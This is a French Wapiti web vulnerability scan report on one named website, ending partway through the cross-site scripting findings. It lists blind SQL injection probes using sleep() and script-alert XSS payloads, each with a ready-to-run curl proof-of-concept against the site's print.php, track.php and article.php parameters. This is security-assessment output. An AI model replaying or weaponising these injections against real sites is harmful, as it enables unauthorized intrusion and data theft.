%rebase('base.tpl')
********************************************************************************
</br>                     Wapiti 3.0.3 - wapiti.sourceforge.io
</br>                        Rapport pour http://icehw.net/
</br>                Date du scan : Sat, 28 Nov 2020 10:58:48 +0000
</br>                          Portée de ce scan : folder
</br>********************************************************************************
</br>
</br>Résumé des vulnérabilités :
</br>---------------------------
</br>                                                            Injection SQL :   1
</br>                                                 Injection SQL en aveugle :  37
</br>                                                   Divulgation de fichier :   0
</br>                                                     Cross Site Scripting :  65
</br>                                                           Injection CRLF :   0
</br>                                                   Exécution de commandes :   0
</br>                                                Contournement de htaccess :   0
</br>                                                      Copie de sauvegarde :   0
</br>                                        Fichier potentiellement dangereux :   0
</br>                                              Server Side Request Forgery :   0
</br>                                                            Open Redirect :   0
</br>                                                                      XXE :   0
</br>********************************************************************************
</br>
</br>Injection SQL
</br>-------------
</br>Injection MySQL via une injection dans le paramètre id
</br>Evil request:
</br>    GET /track.php?id=%C2%BF%27%22%28 HTTP/1.1
</br>    Host: icehw.net
</br>PoC en commande cURL : "curl "http://icehw.net/track.php?id=%C2%BF%27%22%28""
</br>
</br>                                  *   *   *
</br>
</br>********************************************************************************
</br>
</br>Injection SQL en aveugle
</br>------------------------
</br>Faille d'injection SQL en aveugle via une injection dans le paramètre page
</br>Evil request:
</br>    GET /print.php?id=156&page=sleep%287%29%231 HTTP/1.1
</br>    Host: icehw.net
</br>PoC en commande cURL : "curl "http://icehw.net/print.php?id=156&page=sleep%287%29%231""
</br>
</br>                                  *   *   *
</br>
</br>Faille d'injection SQL en aveugle via une injection dans le paramètre page
</br>Evil request:
</br>    GET /print.php?id=158&page=sleep%287%29%231 HTTP/1.1
</br>    Host: icehw.net
</br>PoC en commande cURL : "curl "http://icehw.net/print.php?id=158&page=sleep%287%29%231""
</br>
</br>                                  *   *   *
</br>
</br>Faille d'injection SQL en aveugle via une injection dans le paramètre page
</br>Evil request:
</br>    GET /print.php?id=65&page=sleep%287%29%231 HTTP/1.1
</br>    Host: icehw.net
</br>PoC en commande cURL : "curl "http://icehw.net/print.php?id=65&page=sleep%287%29%231""
</br>
</br>                                  *   *   *
</br>
</br>Faille d'injection SQL en aveugle via une injection dans le paramètre page
</br>Evil request:
</br>    GET /print.php?id=157&page=sleep%287%29%231 HTTP/1.1
</br>    Host: icehw.net
</br>PoC en commande cURL : "curl "http://icehw.net/print.php?id=157&page=sleep%287%29%231""
</br>
</br>                                  *   *   *
</br>
</br>Faille d'injection SQL en aveugle via une injection dans le paramètre id
</br>Evil request:
</br>    GET /print.php?id=sleep%287%29%231&page=2 HTTP/1.1
</br>    Host: icehw.net
</br>PoC en commande cURL : "curl "http://icehw.net/print.php?id=sleep%287%29%231&page=2""
</br>
</br>                                  *   *   *
</br>
</br>Faille d'injection SQL en aveugle via une injection dans le paramètre page
</br>Evil request:
</br>    GET /print.php?id=114&page=sleep%287%29%231 HTTP/1.1
</br>    Host: icehw.net
</br>PoC en commande cURL : "curl "http://icehw.net/print.php?id=114&page=sleep%287%29%231""
</br>
</br>                                  *   *   *
</br>
</br>Faille d'injection SQL en aveugle via une injection dans le paramètre page
</br>Evil request:
</br>    GET /print.php?id=144&page=sleep%287%29%231 HTTP/1.1
</br>    Host: icehw.net
</br>PoC en commande cURL : "curl "http://icehw.net/print.php?id=144&page=sleep%287%29%231""
</br>
</br>                                  *   *   *
</br>
</br>Faille d'injection SQL en aveugle via une injection dans le paramètre page
</br>Evil request:
</br>    GET /print.php?id=102&page=sleep%287%29%231 HTTP/1.1
</br>    Host: icehw.net
</br>PoC en commande cURL : "curl "http://icehw.net/print.php?id=102&page=sleep%287%29%231""
</br>
</br>                                  *   *   *
</br>
</br>Faille d'injection SQL en aveugle via une injection dans le paramètre page
</br>Evil request:
</br>    GET /print.php?id=116&page=sleep%287%29%231 HTTP/1.1
</br>    Host: icehw.net
</br>PoC en commande cURL : "curl "http://icehw.net/print.php?id=116&page=sleep%287%29%231""
</br>
</br>                                  *   *   *
</br>
</br>Faille d'injection SQL en aveugle via une injection dans le paramètre page
</br>Evil request:
</br>    GET /print.php?id=152&page=sleep%287%29%231 HTTP/1.1
</br>    Host: icehw.net
</br>PoC en commande cURL : "curl "http://icehw.net/print.php?id=152&page=sleep%287%29%231""
</br>
</br>                                  *   *   *
</br>
</br>Faille d'injection SQL en aveugle via une injection dans le paramètre page
</br>Evil request:
</br>    GET /print.php?id=107&page=sleep%287%29%231 HTTP/1.1
</br>    Host: icehw.net
</br>PoC en commande cURL : "curl "http://icehw.net/print.php?id=107&page=sleep%287%29%231""
</br>
</br>                                  *   *   *
</br>
</br>Faille d'injection SQL en aveugle via une injection dans le paramètre page
</br>Evil request:
</br>    GET /print.php?id=98&page=sleep%287%29%231 HTTP/1.1
</br>    Host: icehw.net
</br>PoC en commande cURL : "curl "http://icehw.net/print.php?id=98&page=sleep%287%29%231""
</br>
</br>                                  *   *   *
</br>
</br>Faille d'injection SQL en aveugle via une injection dans le paramètre page
</br>Evil request:
</br>    GET /print.php?id=100&page=sleep%287%29%231 HTTP/1.1
</br>    Host: icehw.net
</br>PoC en commande cURL : "curl "http://icehw.net/print.php?id=100&page=sleep%287%29%231""
</br>
</br>                                  *   *   *
</br>
</br>Faille d'injection SQL en aveugle via une injection dans le paramètre page
</br>Evil request:
</br>    GET /print.php?id=103&page=sleep%287%29%231 HTTP/1.1
</br>    Host: icehw.net
</br>PoC en commande cURL : "curl "http://icehw.net/print.php?id=103&page=sleep%287%29%231""
</br>
</br>                                  *   *   *
</br>
</br>Faille d'injection SQL en aveugle via une injection dans le paramètre page
</br>Evil request:
</br>    GET /print.php?id=92&page=sleep%287%29%231 HTTP/1.1
</br>    Host: icehw.net
</br>PoC en commande cURL : "curl "http://icehw.net/print.php?id=92&page=sleep%287%29%231""
</br>
</br>                                  *   *   *
</br>
</br>Faille d'injection SQL en aveugle via une injection dans le paramètre page
</br>Evil request:
</br>    GET /print.php?id=77&page=sleep%287%29%231 HTTP/1.1
</br>    Host: icehw.net
</br>PoC en commande cURL : "curl "http://icehw.net/print.php?id=77&page=sleep%287%29%231""
</br>
</br>                                  *   *   *
</br>
</br>Faille d'injection SQL en aveugle via une injection dans le paramètre page
</br>Evil request:
</br>    GET /print.php?id=78&page=sleep%287%29%231 HTTP/1.1
</br>    Host: icehw.net
</br>PoC en commande cURL : "curl "http://icehw.net/print.php?id=78&page=sleep%287%29%231""
</br>
</br>                                  *   *   *
</br>
</br>Faille d'injection SQL en aveugle via une injection dans le paramètre page
</br>Evil request:
</br>    GET /print.php?id=74&page=sleep%287%29%231 HTTP/1.1
</br>    Host: icehw.net
</br>PoC en commande cURL : "curl "http://icehw.net/print.php?id=74&page=sleep%287%29%231""
</br>
</br>                                  *   *   *
</br>
</br>Faille d'injection SQL en aveugle via une injection dans le paramètre page
</br>Evil request:
</br>    GET /print.php?id=108&page=sleep%287%29%231 HTTP/1.1
</br>    Host: icehw.net
</br>PoC en commande cURL : "curl "http://icehw.net/print.php?id=108&page=sleep%287%29%231""
</br>
</br>                                  *   *   *
</br>
</br>Faille d'injection SQL en aveugle via une injection dans le paramètre page
</br>Evil request:
</br>    GET /print.php?id=72&page=sleep%287%29%231 HTTP/1.1
</br>    Host: icehw.net
</br>PoC en commande cURL : "curl "http://icehw.net/print.php?id=72&page=sleep%287%29%231""
</br>
</br>                                  *   *   *
</br>
</br>Faille d'injection SQL en aveugle via une injection dans le paramètre page
</br>Evil request:
</br>    GET /print.php?id=147&page=sleep%287%29%231 HTTP/1.1
</br>    Host: icehw.net
</br>PoC en commande cURL : "curl "http://icehw.net/print.php?id=147&page=sleep%287%29%231""
</br>
</br>                                  *   *   *
</br>
</br>Faille d'injection SQL en aveugle via une injection dans le paramètre page
</br>Evil request:
</br>    GET /print.php?id=71&page=sleep%287%29%231 HTTP/1.1
</br>    Host: icehw.net
</br>PoC en commande cURL : "curl "http://icehw.net/print.php?id=71&page=sleep%287%29%231""
</br>
</br>                                  *   *   *
</br>
</br>Faille d'injection SQL en aveugle via une injection dans le paramètre page
</br>Evil request:
</br>    GET /print.php?id=149&page=sleep%287%29%231 HTTP/1.1
</br>    Host: icehw.net
</br>PoC en commande cURL : "curl "http://icehw.net/print.php?id=149&page=sleep%287%29%231""
</br>
</br>                                  *   *   *
</br>
</br>Faille d'injection SQL en aveugle via une injection dans le paramètre page
</br>Evil request:
</br>    GET /print.php?id=101&page=sleep%287%29%231 HTTP/1.1
</br>    Host: icehw.net
</br>PoC en commande cURL : "curl "http://icehw.net/print.php?id=101&page=sleep%287%29%231""
</br>
</br>                                  *   *   *
</br>
</br>Faille d'injection SQL en aveugle via une injection dans le paramètre page
</br>Evil request:
</br>    GET /print.php?id=121&page=sleep%287%29%231 HTTP/1.1
</br>    Host: icehw.net
</br>PoC en commande cURL : "curl "http://icehw.net/print.php?id=121&page=sleep%287%29%231""
</br>
</br>                                  *   *   *
</br>
</br>Faille d'injection SQL en aveugle via une injection dans le paramètre page
</br>Evil request:
</br>    GET /print.php?id=113&page=sleep%287%29%231 HTTP/1.1
</br>    Host: icehw.net
</br>PoC en commande cURL : "curl "http://icehw.net/print.php?id=113&page=sleep%287%29%231""
</br>
</br>                                  *   *   *
</br>
</br>Faille d'injection SQL en aveugle via une injection dans le paramètre page
</br>Evil request:
</br>    GET /print.php?id=96&page=sleep%287%29%231 HTTP/1.1
</br>    Host: icehw.net
</br>PoC en commande cURL : "curl "http://icehw.net/print.php?id=96&page=sleep%287%29%231""
</br>
</br>                                  *   *   *
</br>
</br>Faille d'injection SQL en aveugle via une injection dans le paramètre page
</br>Evil request:
</br>    GET /print.php?id=119&page=sleep%287%29%231 HTTP/1.1
</br>    Host: icehw.net
</br>PoC en commande cURL : "curl "http://icehw.net/print.php?id=119&page=sleep%287%29%231""
</br>
</br>                                  *   *   *
</br>
</br>Faille d'injection SQL en aveugle via une injection dans le paramètre page
</br>Evil request:
</br>    GET /print.php?id=146&page=sleep%287%29%231 HTTP/1.1
</br>    Host: icehw.net
</br>PoC en commande cURL : "curl "http://icehw.net/print.php?id=146&page=sleep%287%29%231""
</br>
</br>                                  *   *   *
</br>
</br>Faille d'injection SQL en aveugle via une injection dans le paramètre page
</br>Evil request:
</br>    GET /print.php?id=110&page=sleep%287%29%231 HTTP/1.1
</br>    Host: icehw.net
</br>PoC en commande cURL : "curl "http://icehw.net/print.php?id=110&page=sleep%287%29%231""
</br>
</br>                                  *   *   *
</br>
</br>Faille d'injection SQL en aveugle via une injection dans le paramètre page
</br>Evil request:
</br>    GET /print.php?id=127&page=sleep%287%29%231 HTTP/1.1
</br>    Host: icehw.net
</br>PoC en commande cURL : "curl "http://icehw.net/print.php?id=127&page=sleep%287%29%231""
</br>
</br>                                  *   *   *
</br>
</br>Faille d'injection SQL en aveugle via une injection dans le paramètre page
</br>Evil request:
</br>    GET /print.php?id=148&page=sleep%287%29%231 HTTP/1.1
</br>    Host: icehw.net
</br>PoC en commande cURL : "curl "http://icehw.net/print.php?id=148&page=sleep%287%29%231""
</br>
</br>                                  *   *   *
</br>
</br>Faille d'injection SQL en aveugle via une injection dans le paramètre page
</br>Evil request:
</br>    GET /print.php?id=73&page=sleep%287%29%231 HTTP/1.1
</br>    Host: icehw.net
</br>PoC en commande cURL : "curl "http://icehw.net/print.php?id=73&page=sleep%287%29%231""
</br>
</br>                                  *   *   *
</br>
</br>Faille d'injection SQL en aveugle via une injection dans le paramètre page
</br>Evil request:
</br>    GET /print.php?id=105&page=sleep%287%29%231 HTTP/1.1
</br>    Host: icehw.net
</br>PoC en commande cURL : "curl "http://icehw.net/print.php?id=105&page=sleep%287%29%231""
</br>
</br>                                  *   *   *
</br>
</br>Faille d'injection SQL en aveugle via une injection dans le paramètre id
</br>Evil request:
</br>    GET /print.php?id=sleep%287%29%231&page=3 HTTP/1.1
</br>    Host: icehw.net
</br>PoC en commande cURL : "curl "http://icehw.net/print.php?id=sleep%287%29%231&page=3""
</br>
</br>                                  *   *   *
</br>
</br>Faille d'injection SQL en aveugle via une injection dans le paramètre id
</br>Evil request:
</br>    GET /print.php?id=sleep%287%29%231&page=4 HTTP/1.1
</br>    Host: icehw.net
</br>PoC en commande cURL : "curl "http://icehw.net/print.php?id=sleep%287%29%231&page=4""
</br>
</br>                                  *   *   *
</br>
</br>Faille d'injection SQL en aveugle via une injection dans le paramètre id
</br>Evil request:
</br>    GET /print.php?id=sleep%287%29%231&page=5 HTTP/1.1
</br>    Host: icehw.net
</br>PoC en commande cURL : "curl "http://icehw.net/print.php?id=sleep%287%29%231&page=5""
</br>
</br>                                  *   *   *
</br>
</br>********************************************************************************
</br>
</br>Cross Site Scripting
</br>--------------------
</br>Faille XSS trouvée via l'injection dans le paramètre page
</br>Evil request:
</br>    GET /article.php?id=156&page=%22%3E%3C%2Fa%3E%3CScRiPt%3Ealert%28%27wue1dm7jnc%27%29%3C%2FsCrIpT%3E HTTP/1.1
</br>    Host: icehw.net
</br>PoC en commande cURL : "curl "http://icehw.net/article.php?id=156&page=%22%3E%3C%2Fa%3E%3CScRiPt%3Ealert%28%27wue1dm7jnc%27%29%3C%2FsCrIpT%3E""
</br>
</br>                                  *   *   *
</br>
</br>Faille XSS trouvée via l'injection dans le paramètre page
</br>Evil request:
</br>    GET /article.php?id=124&page=%22%3E%3C%2Fa%3E%3CScRiPt%3Ealert%28%27wa4jb1f7u7%27%29%3C%2FsCrIpT%3E HTTP/1.1
</br>    Host: icehw.net
</br>PoC en commande cURL : "curl "http://icehw.net/article.php?id=124&page=%22%3E%3C%2Fa%3E%3CScRiPt%3Ealert%28%27wa4jb1f7u7%27%29%3C%2FsCrIpT%3E""
</br>
</br>                                  *   *   *
</br>
</br>Faille XSS trouvée via l'injection dans le paramètre page
</br>Evil request:
</br>    GET /article.php?id=112&page=%22%3E%3C%2Fa%3E%3CScRiPt%3Ealert%28%27wdpz5poevo%27%29%3C%2FsCrIpT%3E HTTP/1.1
</br>    Host: icehw.net
</br>PoC en commande cURL : "curl "http://icehw.net/article.php?id=112&page=%22%3E%3C%2Fa%3E%3CScRiPt%3Ealert%28%27wdpz5poevo%27%29%3C%2FsCrIpT%3E""
</br>
</br>                                  *   *   *
</br>
</br>Faille XSS trouvée via l'injection dans le paramètre page
</br>Evil request:
</br>    GET /article.php?id=120&page=%22%3E%3C%2Fa%3E%3CScRiPt%3Ealert%28%27wg8pjyu81k%27%29%3C%2FsCrIpT%3E HTTP/1.1
</br>    Host: icehw.net
</br>PoC en commande cURL : "curl "http://icehw.net/article.php?id=120&page=%22%3E%3C%2Fa%3E%3CScRiPt%3Ealert%28%27wg8pjyu81k%27%29%3C%2FsCrIpT%3E""
</br>
</br>                                  *   *   *
</br>
</br>Faille XSS trouvée via l'injection dans le paramètre page
</br>Evil request:
</br>    GET /article.php?id=143&page=%22%3E%3C%2Fa%3E%3CScRiPt%3Ealert%28%27w0zv8k69c0%27%29%3C%2FsCrIpT%3E HTTP/1.1
</br>    Host: icehw.net
</br>PoC en commande cURL : "curl "http://icehw.net/article.php?id=143&page=%22%3E%3C%2Fa%3E%3CScRiPt%3Ealert%28%27w0zv8k69c0%27%29%3C%2FsCrIpT%3E""
</br>
</br>                                  *   *   *
</br>
</br>Faille XSS trouvée via l'injection dans le paramètre page
</br>Evil request:
</br>    GET /print.php?id=159&page=%3CScRiPt%3Ealert%28%27wtdds2hjns%27%29%3C%2FsCrIpT%3E HTTP/1.1
</br>    Host: icehw.net
</br>PoC en commande cURL : "curl "http://icehw.net/print.php?id=159&page=%3CScRiPt%3Ealert%28%27wtdds2hjns%27%29%3C%2FsCrIpT%3E""
</br>
</br>                                  *   *   *
</br>
</br>Faille XSS trouvée via l'injection dans le paramètre page
</br>Evil request:
</br>    GET /print.php?id=160&page=%3CScRiPt%3Ealert%28%27w3j0u1vfjo%27%29%3C%2FsCrIpT%3E HTTP/1.1
</br>    Host: icehw.net
</br>PoC en commande cURL : "curl "http://icehw.net/print.php?id=160&page=%3CScRiPt%3Ealert%28%27w3j0u1vfjo%27%29%3C%2FsCrIpT%3E""
</br>
</br>                                  *   *   *
</br>
</br>Faille XSS trouvée via l'injection dans le paramètre page
</br>Evil request:
</br>    GET /print.php?id=156&page=%3CScRiPt%3Ealert%28%27wj0o9pwgve%27%29%3C%2FsCrIpT%3E HTTP/1.1
</br>    Host: icehw.net
</br>PoC en commande cURL : "curl "http://icehw.net/print.php?id=156&page=%3CScRiPt%3Ealert%28%27wj0o9pwgve%27%29%3C%2FsCrIpT%3E""
</br>
</br>                                  *   *   *
</br>
</br>Faille XSS trouvée via l'injection dans le paramètre page
</br>Evil request:
</br>    GET /print.php?id=125&page=%3CScRiPt%3Ealert%28%27w1l1iz7nl8%27%29%3C%2FsCrIpT%3E HTTP/1.1
</br>    Host: icehw.net
</br>PoC en commande cURL : "curl "http://icehw.net/print.php?id=125&page=%3CScRiPt%3Ealert%28%27w1l1iz7nl8%27%29%3C%2FsCrIpT%3E""
</br>
</br>                                  *   *   *
</br>
</br>Faille XSS trouvée via l'injection dans le paramètre page
</br>Evil request:
</br>    GET /print.php?id=158&page=%3CScRiPt%3Ealert%28%27wjnqit90ru%27%29%3C%2FsCrIpT%3E HTTP/1.1
</br>    Host: icehw.net
</br>PoC en commande cURL : "curl "http://icehw.net/print.php?id=158&page=%3CScRiPt%3Ealert%28%27wjnqit90ru%27%29%3C%2FsCrIpT%3E""
</br>
</br>                                  *   *   *
</br>
</br>Faille XSS trouvée via l'injection dans le paramètre page
</br>Evil request:
</br>    GET /print.php?id=83&page=%3CScRiPt%3Ealert%28%27wvb5zvj3xh%27%29%3C%2FsCrIpT%3E HTTP/1.1
</br>    Host: icehw.net
</br>PoC en commande cURL : "curl "http://icehw.net/print.php?id=83&page=%3CScRiPt%3Ealert%28%27wvb5zvj3xh%27%29%3C%2FsCrIpT%3E""
</br>
</br>                                  *   *   *
</br>
</br>Faille XSS trouvée via l'injection dans le paramètre page
</br>Evil request:
</br>    GET /print.php?id=124&page=%3CScRiPt%3Ealert%28%27woazcymg69%27%29%3C%2FsCrIpT%3E HTTP/1.1
</br>    Host: icehw.net
</br>PoC en commande cURL : "curl "http://icehw.net/print.php?id=124&page=%3CScRiPt%3Ealert%28%27woazcymg69%27%29%3C%2FsCrIpT%3E""
</br>
</br>                                  *   *   *
</br>
</br>Faille XSS trouvée via l'injection dans le paramètre page
</br>Evil request:
</br>    GET /print.php?id=68&page=%3CScRiPt%3Ealert%28%27woq0g1n73k%27%29%3C%2FsCrIpT%3E HTTP/1.1
</br>    Host: icehw.net
</br>PoC en commande cURL : "curl "http://icehw.net/print.php?id=68&page=%3CScRiPt%3Ealert%28%27woq0g1n73k%27%29%3C%2FsCrIpT%3E""
</br>
</br>                                  *   *   *
</br>
</br>Faille XSS trouvée via l'injection dans le paramètre page
</br>Evil request:
</br>    GET /print.php?id=112&page=%3CScRiPt%3Ealert%28%27woqpej85gt%27%29%3C%2FsCrIpT%3E HTTP/1.1
</br>    Host: icehw.net
</br>PoC en commande cURL : "curl "http://icehw.net/print.php?id=112&page=%3CScRiPt%3Ealert%28%27woqpej85gt%27%29%3C%2FsCrIpT%3E""
</br>
</br>                                  *   *   *
</br>
</br>Faille XSS trouvée via l'injection dans le paramètre page
</br>Evil request:
</br>    GET /print.php?id=104&page=%3CScRiPt%3Ealert%28%27w8gi4buvza%27%29%3C%2FsCrIpT%3E HTTP/1.1
</br>    Host: icehw.net
</br>PoC en commande cURL : "curl "http://icehw.net/print.php?id=104&page=%3CScRiPt%3Ealert%28%27w8gi4buvza%27%29%3C%2FsCrIpT%3E""
</br>
</br>                                  *   *   *
</br>
</br>Faille XSS trouvée via l'injection dans le paramètre page
</br>Evil request:
</br>    GET /print.php?id=65&page=%3CScRiPt%3Ealert%28%27wm3v6n9e12%27%29%3C%2FsCrIpT%3E HTTP/1.1
</br>    Host: icehw.net
</br>PoC en commande cURL : "curl "http://icehw.net/print.php?id=65&page=%3CScRiPt%3Ealert%28%27wm3v6n9e12%27%29%3C%2FsCrIpT%3E""
</br>
</br>                                  *   *   *
</br>
</br>Faille XSS trouvée via l'injection dans le paramètre page
</br>Evil request:
</br>    GET /print.php?id=111&page=%3CScRiPt%3Ealert%28%27wq8b65ihko%27%29%3C%2FsCrIpT%3E HTTP/1.1
</br>    Host: icehw.net
</br>PoC en commande cURL : "curl "http://icehw.net/print.php?id=111&page=%3CScRiPt%3Ealert%28%27wq8b65ihko%27%29%3C%2FsCrIpT%3E""
</br>
</br>                                  *   *   *
</br>
</br>Faille XSS trouvée via l'injection dans le paramètre page
</br>Evil request:
</br>    GET /print.php?id=118&page=%3CScRiPt%3Ealert%28%27w7arig8ir3%27%29%3C%2FsCrIpT%3E HTTP/1.1
</br>    Host: icehw.net
</br>PoC en commande cURL : "curl "http://icehw.net/print.php?id=118&page=%3CScRiPt%3Ealert%28%27w7arig8ir3%27%29%3C%2FsCrIpT%3E""
</br>
</br>                                  *   *   *
</br>
</br>Faille XSS trouvée via l'injection dans le paramètre page
</br>Evil request:
</br>    GET /print.php?id=62&page=%3CScRiPt%3Ealert%28%27w13kei0hp8%27%29%3C%2FsCrIpT%3E HTTP/1.1
</br>    Host: icehw.net
</br>PoC en commande cURL : "curl "http://icehw.net/print.php?id=62&page=%3CScRiPt%3Ealert%28%27w13kei0hp8%27%29%3C%2FsCrIpT%3E""
</br>
</br>                                  *   *   *
</br>
</br>Faille XSS trouvée via l'injection dans le paramètre page
</br>Evil request:
</br>    GET /print.php?id=120&page=%3CScRiPt%3Ealert%28%27wd7fwkdq0d%27%29%3C%2FsCrIpT%3E HTTP/1.1
</br>    Host: icehw.net
</br>PoC en commande cURL : "curl "http://icehw.net/print.php?id=120&page=%3CScRiPt%3Ealert%28%27wd7fwkdq0d%27%29%3C%2FsCrIpT%3E""
</br>
</br>                                  *   *   *
</br>
</br>Faille XSS trouvée via l'injection dans le paramètre page
</br>Evil request:
</br>    GET /print.php?id=99&page=%3CScRiPt%3Ealert%28%27wef50f4eao%27%29%3C%2FsCrIpT%3E HTTP/1.1
</br>    Host: icehw.net
</br>PoC en commande cURL : "curl "http://icehw.net/print.php?id=99&page=%3CScRiPt%3Ealert%28%27wef50f4eao%27%29%3C%2FsCrIpT%3E""
</br>
</br>                                  *   *   *
</br>
</br>Faille XSS trouvée via l'injection dans le paramètre page
</br>Evil request:
</br>    GET /print.php?id=91&page=%3CScRiPt%3Ealert%28%27wdakbv5llu%27%29%3C%2FsCrIpT%3E HTTP/1.1
</br>    Host: icehw.net
</br>PoC en commande cURL : "curl "http://icehw.net/print.php?id=91&page=%3CScRiPt%3Ealert%28%27wdakbv5llu%27%29%3C%2FsCrIpT%3E""
</br>
</br>                                  *   *   *
</br>
</br>Faille XSS trouvée via l'injection dans le paramètre page
</br>Evil request:
</br>    GET /print.php?id=143&page=%3CScRiPt%3Ealert%28%27wdapd27ujy%27%29%3C%2FsCrIpT%3E HTTP/1.1
</br>    Host: icehw.net
</br>PoC en commande cURL : "curl "http://icehw.net/print.php?id=143&page=%3CScRiPt%3Ealert%28%27wdapd27ujy%27%29%3C%2FsCrIpT%3E""
</br>
</br>                                  *   *   *
</br>
</br>Faille XSS trouvée via l'injection dans le paramètre page
</br>Evil request:
</br>    GET /print.php?id=90&page=%3CScRiPt%3Ealert%28%27wleex9qbmy%27%29%3C%2FsCrIpT%3E HTTP/1.1
</br>    Host: icehw.net
</br>PoC en commande cURL : "curl "http://icehw.net/print.php?id=90&page=%3CScRiPt%3Ealert%28%27wleex9qbmy%27%29%3C%2FsCrIpT%3E""
</br>
</br>                                  *   *   *
</br>
</br>Faille XSS trouvée via l'injection dans le paramètre page
</br>Evil request:
</br>    GET /print.php?id=157&page=%3CScRiPt%3Ealert%28%27w5bn5xhte4%27%29%3C%2FsCrIpT%3E HTTP/1.1
</br>    Host: icehw.net
</br>PoC en commande cURL : "curl "http://icehw.net/print.php?id=157&page=%3CScRiPt%3Ealert%28%27w5bn5xhte4%27%29%3C%2FsCrIpT%3E""
</br>
</br>                                  *   *   *
</br>
</br>Faille XSS trouvée via l'injection dans le paramètre page
</br>Evil request:
</br>    GET /print.php?id=114&page=%3CScRiPt%3Ealert%28%27w7am0zo2s3%27%29%3C%2FsCrIpT%3E HTTP/1.1
</br>    Host: icehw.net
</br>PoC en commande cURL : "curl "http://icehw.net/print.php?id=114&page=%3CScRiPt%3Ealert%28%27w7am0zo2s3%27%29%3C%2FsCrIpT%3E""
</br>
</br>                                  *   *   *
</br>
</br>Faille XSS trouvée via l'injection dans le paramètre page
</br>Evil request:
</br>    GET /print.php?id=144&page=%3CScRiPt%3Ealert%28%27wax9aicbi1%27%29%3C%2FsCrIpT%3E HTTP/1.1
</br>    Host: icehw.net
</br>PoC en commande cURL : "curl "http://icehw.net/print.php?id=144&page=%3CScRiPt%3Ealert%28%27wax9aicbi1%27%29%3C%2FsCrIpT%3E""
</br>
</br>                                  *   *   *
</br>
</br>Faille XSS trouvée via l'injection dans le paramètre page
</br>Evil request:
</br>    GET /print.php?id=102&page=%3CScRiPt%3Ealert%28%27wl3qexpljg%27%29%3C%2FsCrIpT%3E HTTP/1.1
</br>    Host: icehw.net
</br>PoC en commande cURL : "curl "http://icehw.net/print.php?id=102&page=%3CScRiPt%3Ealert%28%27wl3qexpljg%27%29%3C%2FsCrIpT%3E""
</br>
</br>                                  *   *   *
</br>
</br>Faille XSS trouvée via l'injection dans le paramètre page
</br>Evil request:
</br>    GET /print.php?id=116&page=%3CScRiPt%3Ealert%28%27wsrriqd6xl%27%29%3C%2FsCrIpT%3E HTTP/1.1
</br>    Host: icehw.net
</br>PoC en commande cURL : "curl "http://icehw.net/print.php?id=116&page=%3CScRiPt%3Ealert%28%27wsrriqd6xl%27%29%3C%2FsCrIpT%3E""
</br>
</br>                                  *   *   *
</br>
</br>Faille XSS trouvée via l'injection dans le paramètre page
</br>Evil request:
</br>    GET /print.php?id=152&page=%3CScRiPt%3Ealert%28%27wkygtkzdr7%27%29%3C%2FsCrIpT%3E HTTP/1.1
</br>    Host: icehw.net
</br>PoC en commande cURL : "curl "http://icehw.net/print.php?id=152&page=%3CScRiPt%3Ealert%28%27wkygtkzdr7%27%29%3C%2FsCrIpT%3E""
</br>
</br>                                  *   *   *
</br>
</br>Faille XSS trouvée via l'injection dans le paramètre page
</br>Evil request:
</br>    GET /print.php?id=107&page=%3CScRiPt%3Ealert%28%27wdsd0t9jl2%27%29%3C%2FsCrIpT%3E HTTP/1.1
</br>    Host: icehw.net
</br>PoC en commande cURL : "curl "http://icehw.net/print.php?id=107&page=%3CScRiPt%3Ealert%28%27wdsd0t9jl2%27%29%3C%2FsCrIpT%3E""
</br>
</br>                                  *   *   *
</br>
</br>Faille XSS trouvée via l'injection dans le paramètre page
</br>Evil request:
</br>    GET /print.php?id=98&page=%3CScRiPt%3Ealert%28%27wbry73fosg%27%29%3C%2FsCrIpT%3E HTTP/1.1
</br>    Host: icehw.net
</br>PoC en commande cURL : "curl "http://icehw.net/print.php?id=98&page=%3CScRiPt%3Ealert%28%27wbry73fosg%27%29%3C%2FsCrIpT%3E""
</br>
</br>                                  *   *   *
</br>
</br>Faille XSS trouvée via l'injection dans le paramètre page
</br>Evil request:
</br>    GET /print.php?id=100&page=%3CScRiPt%3Ealert%28%27wzbc8wtyc0%27%29%3C%2FsCrIpT%3E HTTP/1.1
</br>    Host: icehw.net
</br>PoC en commande cURL : "curl "http://icehw.net/print.php?id=100&page=%3CScRiPt%3Ealert%28%27wzbc8wtyc0%27%29%3C%2FsCrIpT%3E""
</br>
</br>                                  *   *   *
</br>
</br>Faille XSS trouvée via l'injection dans le paramètre page
</br>Evil request:
</br>    GET /print.php?id=103&page=%3CScRiPt%3Ealert%28%27w1vpjwq3ci%27%29%3C%2FsCrIpT%3E HTTP/1.1
</br>    Host: icehw.net
</br>PoC en commande cURL : "curl "http://icehw.net/print.php?id=103&page=%3CScRiPt%3Ealert%28%27w1vpjwq3ci%27%29%3C%2FsCrIpT%3E""
</br>
</br>                                  *   *   *
</br>
</br>Faille XSS trouvée via l'injection dans le paramètre page
</br>Evil request:
</br>    GET /print.php?id=92&page=%3CScRiPt%3Ealert%28%27wgs3lx1yjf%27%29%3C%2FsCrIpT%3E HTTP/1.1
</br>    Host: icehw.net
</br>PoC en commande cURL : "curl "http://icehw.net/print.php?id=92&page=%3CScRiPt%3Ealert%28%27wgs3lx1yjf%27%29%3C%2FsCrIpT%3E""
</br>
</br>                                  *   *   *
</br>
</br>Faille XSS trouvée via l'injection dans le paramètre page
</br>Evil request:
</br>    GET /print.php?id=77&page=%3CScRiPt%3Ealert%28%27wbtz1olktd%27%29%3C%2FsCrIpT%3E HTTP/1.1
</br>    Host: icehw.net
</br>PoC en commande cURL : "curl "http://icehw.net/print.php?id=77&page=%3CScRiPt%3Ealert%28%27wbtz1olktd%27%29%3C%2FsCrIpT%3E""
</br>
</br>                                  *   *   *
</br>
</br>Faille XSS trouvée via l'injection dans le paramètre page
</br>Evil request:
</br>    GET /print.php?id=78&page=%3CScRiPt%3Ealert%28%27wfh0yyru0k%27%29%3C%2FsCrIpT%3E HTTP/1.1
</br>    Host: icehw.net
</br>PoC en commande cURL : "curl "http://icehw.net/print.php?id=78&page=%3CScRiPt%3Ealert%28%27wfh0yyru0k%27%29%3C%2FsCrIpT%3E""
</br>
</br>                                  *   *   *
</br>
</br>Faille XSS trouvée via l'injection dans le paramètre page
</br>Evil request:
</br>    GET /print.php?id=74&page=%3CScRiPt%3Ealert%28%27wkui9vpcpq%27%29%3C%2FsCrIpT%3E HTTP/1.1
</br>    Host: icehw.net
